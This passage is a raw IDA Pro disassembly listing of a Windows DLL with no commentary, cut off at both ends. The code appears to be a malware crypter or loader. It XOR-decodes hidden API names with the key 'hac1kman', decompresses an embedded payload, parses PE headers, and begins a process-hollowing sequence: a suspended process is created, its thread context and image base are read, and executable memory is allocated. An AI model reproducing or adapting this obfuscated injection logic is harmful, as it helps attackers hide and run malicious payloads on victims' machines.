; ---------------------------------------------------------------------------
loc_100017E2: ; CODE XREF: sub_100017AC+11�j
; sub_100017AC+17�j
mov eax, edx
call sub_10001690
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_10001801
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_100017FC
mov ecx, esi
loc_100017FC: ; CODE XREF: sub_100017AC+4C�j
call sub_100011B4
loc_10001801: ; CODE XREF: sub_100017AC+B�j
; sub_100017AC+43�j
mov eax, ebx
call sub_100015F8
mov [ebx], edi
loc_1000180A: ; CODE XREF: sub_100017AC+34�j
pop edi
pop esi
pop ebx
retn
sub_100017AC endp
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_10001814 proc near ; CODE XREF: CODE:1000182B�p
; DATA XREF: sub_10001834:loc_1000183B�o
mov al, 10h
jmp loc_100011A8
sub_10001814 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_1000181C: ; DATA XREF: sub_10001834+14�o
mov ax, [eax]
sub ax, 2
jb short locret_10001830
sub ax, 8
jz short locret_10001830
call sub_10001814
locret_10001830: ; CODE XREF: CODE:10001823�j
; CODE:10001829�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001834 proc near ; CODE XREF: sub_100018EC+1D�p
mov edx, offset dword_1000405C
xor eax, eax
loc_1000183B: ; CODE XREF: sub_10001834+12�j
mov dword ptr [edx+eax*4], offset sub_10001814
inc eax
cmp eax, 2Bh
jnz short loc_1000183B
mov eax, offset loc_1000181C
mov ds:dword_1000405C, eax
retn
sub_10001834 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001854 proc near ; DATA XREF: sub_100018EC+13�o
mov al, 11h
jmp loc_100011A8
sub_10001854 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_1000185C proc near ; CODE XREF: sub_100019B4+5�p
mov edx, ds:dword_1000300C
mov [eax], edx
mov ds:dword_1000300C, eax
retn
sub_1000185C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000186C proc near ; CODE XREF: sub_10001510+66�p
; DATA XREF: DATA:off_10003014�o
push ebx
push esi
mov esi, eax
mov ebx, ds:dword_10003010
test ebx, ebx
jz short loc_10001886
loc_1000187A: ; CODE XREF: sub_1000186C+18�j
mov eax, [esi+4]
call dword ptr [ebx+4]
mov ebx, [ebx]
test ebx, ebx
jnz short loc_1000187A
loc_10001886: ; CODE XREF: sub_1000186C+C�j
pop esi
pop ebx
retn
sub_1000186C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000188C proc near ; CODE XREF: sub_10001DFC+3FC�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_1000189A
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_1000189A: ; CODE XREF: sub_1000188C+8�j
call ds:off_10003030
pop ebp
retn
sub_1000188C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100018A4 proc near ; DATA XREF: CODE:10002388�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_100018E0
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10004024
jnz short loc_100018D2
cmp ds:dword_10004058, 0
jz short loc_100018CC
call ds:dword_10004058
loc_100018CC: ; CODE XREF: sub_100018A4+20�j
call ds:off_10003024
loc_100018D2: ; CODE XREF: sub_100018A4+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100018E7
loc_100018DF: ; CODE XREF: sub_100018A4+41�j
retn
; ---------------------------------------------------------------------------
loc_100018E0: ; DATA XREF: sub_100018A4+6�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_100018DF
; ---------------------------------------------------------------------------
loc_100018E7: ; CODE XREF: sub_100018A4:loc_100018DF�j
; DATA XREF: sub_100018A4+36�o
pop ebp
retn
sub_100018A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100018EC proc near ; DATA XREF: CODE:10002384�o
sub ds:dword_10004024, 1
jnb short locret_10001918
call GetProcessHeap ; GetProcessHeap
mov ds:hHeap, eax
mov ds:dword_10004000, offset sub_10001854
call sub_10001834
call GetCurrentThreadId ; GetCurrentThreadId
mov ds:dword_10004018, eax
locret_10001918: ; CODE XREF: sub_100018EC+7�j
retn
sub_100018EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000191C proc near ; CODE XREF: sub_10001930+21�p
push eax ; uBytes
push 40h ; uFlags
call LocalAlloc ; LocalAlloc
retn
sub_1000191C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001928 proc near ; CODE XREF: sub_10001930+1�p
mov eax, 4
retn
sub_10001928 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001930 proc near ; CODE XREF: sub_10001974:loc_1000198E�p
push ebx
call sub_10001928
mov ebx, eax
test ebx, ebx
jz short loc_10001972
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_1000194F
mov eax, 0E2h
call sub_100015EC
; ---------------------------------------------------------------------------
loc_1000194F: ; CODE XREF: sub_10001930+13�j
mov eax, ebx
call sub_1000191C
test eax, eax
jnz short loc_10001966
mov eax, 0E2h
call sub_100015EC
; ---------------------------------------------------------------------------
jmp short loc_10001972
; ---------------------------------------------------------------------------
loc_10001966: ; CODE XREF: sub_10001930+28�j
push eax ; lpTlsValue
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsSetValue ; TlsSetValue
loc_10001972: ; CODE XREF: sub_10001930+A�j
; sub_10001930+34�j
pop ebx
retn
sub_10001930 endp
; =============== S U B R O U T I N E =======================================
sub_10001974 proc near ; CODE XREF: sub_1000115C+20�p
mov cl, ds:byte_10004108
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_100019A9
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_1000198E: ; CODE XREF: sub_10001974+3D�j
call sub_10001930
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsGetValue ; TlsGetValue
test eax, eax
jz short loc_100019A3
retn
; ---------------------------------------------------------------------------
loc_100019A3: ; CODE XREF: sub_10001974+2C�j
mov eax, ds:dword_1000411C
retn
; ---------------------------------------------------------------------------
loc_100019A9: ; CODE XREF: sub_10001974+D�j
push eax ; dwTlsIndex
call TlsGetValue ; TlsGetValue
test eax, eax
jz short loc_1000198E
retn
sub_10001974 endp
; =============== S U B R O U T I N E =======================================
sub_100019B4 proc near ; CODE XREF: sub_100019C0+2E�p
mov eax, offset dword_10003058
call sub_1000185C
retn
sub_100019B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100019C0 proc near ; CODE XREF: sub_100023AC+17�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0 ; lpModuleName
call GetModuleHandleA ; GetModuleHandleA
mov ds:dword_10004114, eax
mov eax, ds:dword_10004114
mov ds:dword_1000305C, eax
xor eax, eax
mov ds:dword_10003060, eax
xor eax, eax
mov ds:dword_10003064, eax
call sub_100019B4
mov edx, offset dword_10003058
mov eax, ebx
call sub_100014A4
pop ebx
retn
sub_100019C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001A04 proc near ; DATA XREF: CODE:10002380�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001A29
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10004118
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001A30
loc_10001A28: ; CODE XREF: sub_10001A04+2A�j
retn
; ---------------------------------------------------------------------------
loc_10001A29: ; DATA XREF: sub_10001A04+6�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001A28
; ---------------------------------------------------------------------------
loc_10001A30: ; CODE XREF: sub_10001A04:loc_10001A28�j
; DATA XREF: sub_10001A04+1F�o
pop ebp
retn
sub_10001A04 endp
; ---------------------------------------------------------------------------
align 4
loc_10001A34: ; DATA XREF: CODE:off_1000237C�o
sub ds:dword_10004118, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001A3C proc near ; DATA XREF: CODE:10002390�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001A61
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10004120
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001A68
loc_10001A60: ; CODE XREF: sub_10001A3C+2A�j
retn
; ---------------------------------------------------------------------------
loc_10001A61: ; DATA XREF: sub_10001A3C+6�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001A60
; ---------------------------------------------------------------------------
loc_10001A68: ; CODE XREF: sub_10001A3C:loc_10001A60�j
; DATA XREF: sub_10001A3C+1F�o
pop ebp
retn
sub_10001A3C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001A6C proc near ; DATA XREF: CODE:1000238C�o
sub ds:dword_10004120, 1
retn
sub_10001A6C endp
; [00000006 BYTES: COLLAPSED FUNCTION GetProcAddress. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LoadLibraryA. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_10001A84 proc near ; CODE XREF: sub_10001DFC+23F�p
; sub_10001DFC+297�p ...
xchg eax, edx
call sub_100011B4
retn
sub_10001A84 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001A8C proc near ; CODE XREF: sub_10001DFC+2E7�p
; sub_10001DFC+2F7�p
xor ecx, ecx
call sub_10001360
retn
sub_10001A8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001A94 proc near ; DATA XREF: CODE:10002398�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001AB9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10004124
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001AC0
loc_10001AB8: ; CODE XREF: sub_10001A94+2A�j
retn
; ---------------------------------------------------------------------------
loc_10001AB9: ; DATA XREF: sub_10001A94+6�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001AB8
; ---------------------------------------------------------------------------
loc_10001AC0: ; CODE XREF: sub_10001A94:loc_10001AB8�j
; DATA XREF: sub_10001A94+1F�o
pop ebp
retn
sub_10001A94 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001AC4 proc near ; DATA XREF: CODE:10002394�o
sub ds:dword_10004124, 1
retn
sub_10001AC4 endp
; [00000006 BYTES: COLLAPSED FUNCTION RtlDecompressBuffer. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_10001AD4 proc near ; CODE XREF: sub_10001AE0+25�p
; sub_10001BA0+31�p ...
test eax, eax
jz short locret_10001ADD
sub eax, 4
mov eax, [eax]
locret_10001ADD: ; CODE XREF: sub_10001AD4+2�j
retn
sub_10001AD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001AE0 proc near ; CODE XREF: sub_100023AC+1E3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_10001748
xor eax, eax
push ebp
push offset loc_10001B8D
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_4]
call sub_10001AD4
mov ebx, eax
cmp ebx, 4
jbe short loc_10001B70
lea eax, [ebp+arg_4]
call sub_100017A4
mov edi, eax
mov edx, [edi]
mov eax, esi
call sub_100017AC
cmp dword ptr [edi], 80000h
jbe short loc_10001B35
mov [ebp+var_8], 2
jmp short loc_10001B3C
; ---------------------------------------------------------------------------
loc_10001B35: ; CODE XREF: sub_10001AE0+4A�j
mov [ebp+var_8], 102h
loc_10001B3C: ; CODE XREF: sub_10001AE0+53�j
lea eax, [ebp+var_4]
push eax
sub ebx, 4
push ebx
lea eax, [ebp+arg_4]
call sub_100017A4
add eax, 4
push eax
mov eax, [edi]
push eax
mov eax, esi
call sub_100017A4
push eax
mov eax, [ebp+var_8]
push eax
call RtlDecompressBuffer ; RtlDecompressBuffer
mov eax, esi
mov edx, [ebp+var_4]
call sub_100017AC
jmp short loc_10001B77
; ---------------------------------------------------------------------------
loc_10001B70: ; CODE XREF: sub_10001AE0+2F�j
mov eax, esi
call sub_100015F8
loc_10001B77: ; CODE XREF: sub_10001AE0+8E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001B94
loc_10001B84: ; CODE XREF: sub_10001AE0+B2�j
lea eax, [ebp+arg_4]
call sub_100015F8
retn
; ---------------------------------------------------------------------------
loc_10001B8D: ; DATA XREF: sub_10001AE0+17�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001B84
; ---------------------------------------------------------------------------
loc_10001B94: ; CODE XREF: sub_10001AE0+AC�j
; DATA XREF: sub_10001AE0+9F�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_10001AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001BA0 proc near ; CODE XREF: sub_100023AC+1F0�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_C], eax
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_10001748
xor eax, eax
push ebp
push offset loc_10001C63
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_100015F8
mov eax, [ebp+arg_4]
call sub_10001AD4
mov [ebp+var_8], eax
mov ebx, 1
cmp ebx, [ebp+var_8]
ja short loc_10001C45
loc_10001BE3: ; CODE XREF: sub_10001BA0+A3�j
mov eax, [ebp+arg_4]
mov al, [eax+ebx-1]
test al, al
jnz short loc_10001C26
mov eax, [ebp+arg_4]
mov al, [eax+ebx]
mov [ebp+var_1], al
mov eax, [esi]
call sub_10001AD4
mov edi, eax
xor edx, edx
mov dl, [ebp+var_1]
add edx, edi
mov eax, esi
call sub_100017AC
mov eax, esi
call sub_100017A4
add eax, edi
xor edx, edx
mov dl, [ebp+var_1]
xor ecx, ecx
call sub_10001360
inc ebx
jmp short loc_10001C3F
; ---------------------------------------------------------------------------
loc_10001C26: ; CODE XREF: sub_10001BA0+4C�j
lea eax, [ebp+var_C]
mov edx, [ebp+arg_4]
mov dl, [edx+ebx-1]
call sub_100016EC
mov edx, [ebp+var_C]
mov eax, esi
call sub_10001704
loc_10001C3F: ; CODE XREF: sub_10001BA0+84�j
inc ebx
cmp ebx, [ebp+var_8]
jbe short loc_10001BE3
loc_10001C45: ; CODE XREF: sub_10001BA0+41�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001C6A
loc_10001C52: ; CODE XREF: sub_10001BA0+C8�j
lea eax, [ebp+var_C]
call sub_100015F8
lea eax, [ebp+arg_4]
call sub_100015F8
retn
; ---------------------------------------------------------------------------
loc_10001C63: ; DATA XREF: sub_10001BA0+1C�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001C52
; ---------------------------------------------------------------------------
loc_10001C6A: ; CODE XREF: sub_10001BA0+C2�j
; DATA XREF: sub_10001BA0+AD�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_10001BA0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001C74 proc near ; DATA XREF: CODE:100023A0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001C99
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10004128
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001CA0
loc_10001C98: ; CODE XREF: sub_10001C74+2A�j
retn
; ---------------------------------------------------------------------------
loc_10001C99: ; DATA XREF: sub_10001C74+6�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001C98
; ---------------------------------------------------------------------------
loc_10001CA0: ; CODE XREF: sub_10001C74:loc_10001C98�j
; DATA XREF: sub_10001C74+1F�o
pop ebp
retn
sub_10001C74 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001CA4 proc near ; DATA XREF: CODE:1000239C�o
sub ds:dword_10004128, 1
retn
sub_10001CA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001CAC proc near ; CODE XREF: sub_10001DFC+34�p
; sub_10001DFC+5D�p ...
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_10001748
mov eax, [ebp+var_8]
call sub_10001748
xor eax, eax
push ebp
push offset loc_10001D63
push dword ptr fs:[eax]
mov fs:[eax], esp
mov esi, 1
mov eax, [ebp+var_4]
call sub_100016FC
mov edi, eax
test edi, edi
jle short loc_10001D3D
mov ebx, 1
loc_10001CF4: ; CODE XREF: sub_10001CAC+8F�j
mov eax, [ebp+var_4]
mov al, [eax+ebx-1]
and al, 0Fh
mov edx, [ebp+var_8]
mov dl, [edx+esi-1]
and dl, 0Fh
xor al, dl
mov [ebp+var_D], al
lea eax, [ebp+var_4]
call sub_100017A4
mov edx, [ebp+var_4]
mov dl, [edx+ebx-1]
and dl, 0F0h
mov cl, [ebp+var_D]
add dl, cl
mov [eax+ebx-1], dl
inc esi
mov eax, [ebp+var_8]
call sub_100016FC
cmp esi, eax
jle short loc_10001D39
mov esi, 1
loc_10001D39: ; CODE XREF: sub_10001CAC+86�j
inc ebx
dec edi
jnz short loc_10001CF4
loc_10001D3D: ; CODE XREF: sub_10001CAC+41�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
call sub_1000164C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001D6A
loc_10001D55: ; CODE XREF: sub_10001CAC+BC�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_1000161C
retn
; ---------------------------------------------------------------------------
loc_10001D63: ; DATA XREF: sub_10001CAC+25�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_10001D55
; ---------------------------------------------------------------------------
loc_10001D6A: ; CODE XREF: sub_10001CAC+B6�j
; DATA XREF: sub_10001CAC+A4�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10001CAC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001D74 proc near ; CODE XREF: sub_10001D94+53�p
; sub_10001DFC+250�p ...
push ebx
mov ebx, edx
mov ecx, eax
mov eax, ecx
xor edx, edx
div ebx
test edx, edx
jnz short loc_10001D87
mov eax, ecx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_10001D87: ; CODE XREF: sub_10001D74+D�j
mov eax, ecx
xor edx, edx
div ebx
inc eax
imul ebx
pop ebx
retn
sub_10001D74 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001D94 proc near ; CODE XREF: sub_10001DFC+1D8�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ecx, [eax+3Ch]
add ecx, eax
mov ebp, [ecx+38h]
mov ebx, [ecx+54h]
mov eax, ebx
xor edx, edx
div ebp
test edx, edx
jnz short loc_10001DB3
mov [esp+14h+var_14], ebx
jmp short loc_10001DBF
; ---------------------------------------------------------------------------
loc_10001DB3: ; CODE XREF: sub_10001D94+18�j
mov eax, ebx
xor edx, edx
div ebp
inc eax
add eax, ebp
mov [esp+14h+var_14], eax
loc_10001DBF: ; CODE XREF: sub_10001D94+1D�j
lea edi, [ecx+18h]
movzx eax, word ptr [ecx+14h]
add edi, eax
movzx esi, word ptr [ecx+6]
dec esi
test esi, esi
jb short loc_10001DF3
inc esi
xor ebx, ebx
loc_10001DD4: ; CODE XREF: sub_10001D94+5D�j
lea eax, [ebx+ebx*4]
cmp dword ptr [edi+eax*8+8], 0
jz short loc_10001DEF
lea eax, [ebx+ebx*4]
mov eax, [edi+eax*8+8]
mov edx, ebp
call sub_10001D74
add [esp+14h+var_14], eax
loc_10001DEF: ; CODE XREF: sub_10001D94+48�j
inc ebx
dec esi
jnz short loc_10001DD4
loc_10001DF3: ; CODE XREF: sub_10001D94+3B�j
mov eax, [esp+14h+var_14]
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001D94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001DFC proc near ; CODE XREF: sub_100023AC+22B�p
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_174 = dword ptr -174h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_10C = dword ptr -10Ch
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
hModule = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 100013C8 SIZE 00000036 BYTES
push ebp
mov ebp, esp
mov ecx, 31h
loc_10001E04: ; CODE XREF: sub_10001DFC+D�j
push 0
push 0
dec ecx
jnz short loc_10001E04
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_1000222B
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_164]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_10002258
call sub_10001CAC
mov eax, [ebp+var_164]
call sub_10001758
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov [ebp+hModule], eax
lea ecx, [ebp+var_168]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_10002270
call sub_10001CAC
mov eax, [ebp+var_168]
call sub_10001758
push eax ; lpProcName
mov eax, [ebp+hModule]
push eax ; hModule
call GetProcAddress ; GetProcAddress
mov ebx, eax
lea ecx, [ebp+var_16C]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_10002288
call sub_10001CAC
mov eax, [ebp+var_16C]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_28], eax
lea ecx, [ebp+var_170]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_1000229C
call sub_10001CAC
mov eax, [ebp+var_170]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_24], eax
lea ecx, [ebp+var_174]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_100022B4
call sub_10001CAC
mov eax, [ebp+var_174]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_2C], eax
lea ecx, [ebp+var_178]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_100022D0
call sub_10001CAC
mov eax, [ebp+var_178]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_30], eax
lea ecx, [ebp+var_17C]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset a_sjunSakdprfhl ; "_sjun]sakdprFhlazx"
call sub_10001CAC
mov eax, [ebp+var_17C]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_34], eax
lea ecx, [ebp+var_180]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_10002308
call sub_10001CAC
mov eax, [ebp+var_180]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_38], eax
lea ecx, [ebp+var_184]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset aZdptfhufzdbe ; "ZdptfhUfzdbe"
call sub_10001CAC
mov eax, [ebp+var_184]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_3C], eax
lea ecx, [ebp+var_188]
mov edx, offset aHac1kman ; "hac1kman"
mov eax, offset dword_1000233C
call sub_10001CAC
mov eax, [ebp+var_188]
call sub_10001758
push eax
mov eax, [ebp+hModule]
push eax
call ebx
mov [ebp+var_40], eax
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
call sub_10001D94
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
call sub_100010D0
mov [ebp+var_1C], eax
xor edx, edx
push ebp
push offset loc_10002206
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov eax, [eax+54h]
mov edx, [ebp+var_18]
lea esi, [edx+18h]
mov edx, [ebp+var_18]
movzx edx, word ptr [edx+14h]
add esi, edx
mov edx, [ebp+var_18]
movzx edi, word ptr [edx+6]
dec edi
test edi, edi
jb short loc_10002033
inc edi
xor ebx, ebx
loc_1000201F: ; CODE XREF: sub_10001DFC+235�j
lea edx, [ebx+ebx*4]
cmp eax, [esi+edx*8+14h]
jbe short loc_1000202F
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+14h]
loc_1000202F: ; CODE XREF: sub_10001DFC+22A�j
inc ebx
dec edi
jnz short loc_1000201F
loc_10002033: ; CODE XREF: sub_10001DFC+21E�j
mov ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_14]
call sub_10001A84
mov eax, [ebp+var_18]
mov edx, [eax+38h]
mov eax, [ebp+var_18]
mov eax, [eax+54h]
call sub_10001D74
add eax, [ebp+var_14]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
movzx edi, word ptr [eax+6]
dec edi
test edi, edi
jb short loc_100020D8
inc edi
xor ebx, ebx
loc_10002066: ; CODE XREF: sub_10001DFC+2DA�j
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+10h]
test eax, eax
jbe short loc_100020B2
lea edx, [ebx+ebx*4]
lea edx, [ebx+ebx*4]
cmp eax, [esi+edx*8+8]
jbe short loc_10002084
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
loc_10002084: ; CODE XREF: sub_10001DFC+27F�j
lea edx, [ebx+ebx*4]
mov edx, [esi+edx*8+14h]
add edx, [ebp+var_4]
mov ecx, eax
mov eax, [ebp+var_14]
call sub_10001A84
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
mov edx, [ebp+var_18]
mov edx, [edx+38h]
call sub_10001D74
add eax, [ebp+var_14]
mov [ebp+var_14], eax
jmp short loc_100020D4
; ---------------------------------------------------------------------------
loc_100020B2: ; CODE XREF: sub_10001DFC+273�j
lea eax, [ebx+ebx*4]
cmp dword ptr [esi+eax*8+8], 0
jz short loc_100020D4
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
mov edx, [ebp+var_18]
mov edx, [edx+38h]
call sub_10001D74
add eax, [ebp+var_14]
mov [ebp+var_14], eax
loc_100020D4: ; CODE XREF: sub_10001DFC+2B4�j
; sub_10001DFC+2BE�j
inc ebx
dec edi
jnz short loc_10002066
loc_100020D8: ; CODE XREF: sub_10001DFC+265�j
lea eax, [ebp+var_160]
mov edx, 44h
call sub_10001A8C
lea eax, [ebp+var_10C]
mov edx, 0CCh
call sub_10001A8C
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_160]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
lea edx, [ebp+var_18C]
xor eax, eax
call sub_10001300
mov eax, [ebp+var_18C]
call sub_10001758
push eax
push 0
call [ebp+var_24]
mov [ebp+var_10C], 10007h
lea eax, [ebp+var_10C]
push eax
mov eax, [ebp+var_118]
push eax
call [ebp+var_2C]
lea eax, [ebp+var_C]
push eax
push 4
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_68]
add eax, 8
push eax
mov eax, [ebp+var_11C]
push eax
call [ebp+var_30]
push 40h
push 3000h
mov eax, [ebp+var_10]
push eax
